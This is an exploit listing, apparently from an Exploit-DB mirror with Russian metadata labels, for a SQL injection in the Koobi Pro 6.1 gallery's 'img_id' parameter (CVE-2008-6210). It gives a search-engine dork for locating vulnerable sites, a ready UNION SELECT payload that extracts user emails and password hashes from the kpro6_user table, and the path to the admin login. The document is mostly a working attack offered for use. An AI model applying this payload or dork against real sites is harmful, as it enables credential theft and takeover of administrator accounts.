Exploit Dream4 Koobi Pro 6.1 Gallery - 'img_id' SQL Injection

[Exploiter]

EDB-ID

10751

Проверка EDB

1. Пройдено

Автор

BILGE_KAGAN

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-6210

Дата публикации

2009-12-27

##########################################
#
# Koobi Pro v6.1 gallery (img_id)
#

##########################################
#
##AUTHOR : BILGE_KAGAN
#
####HOME : http://www.1923turk.biz
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=gallerypic img_id"

###########################################
EXPLOiT:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+kpro6_user


aDM�N PANEL�:

admin/login.php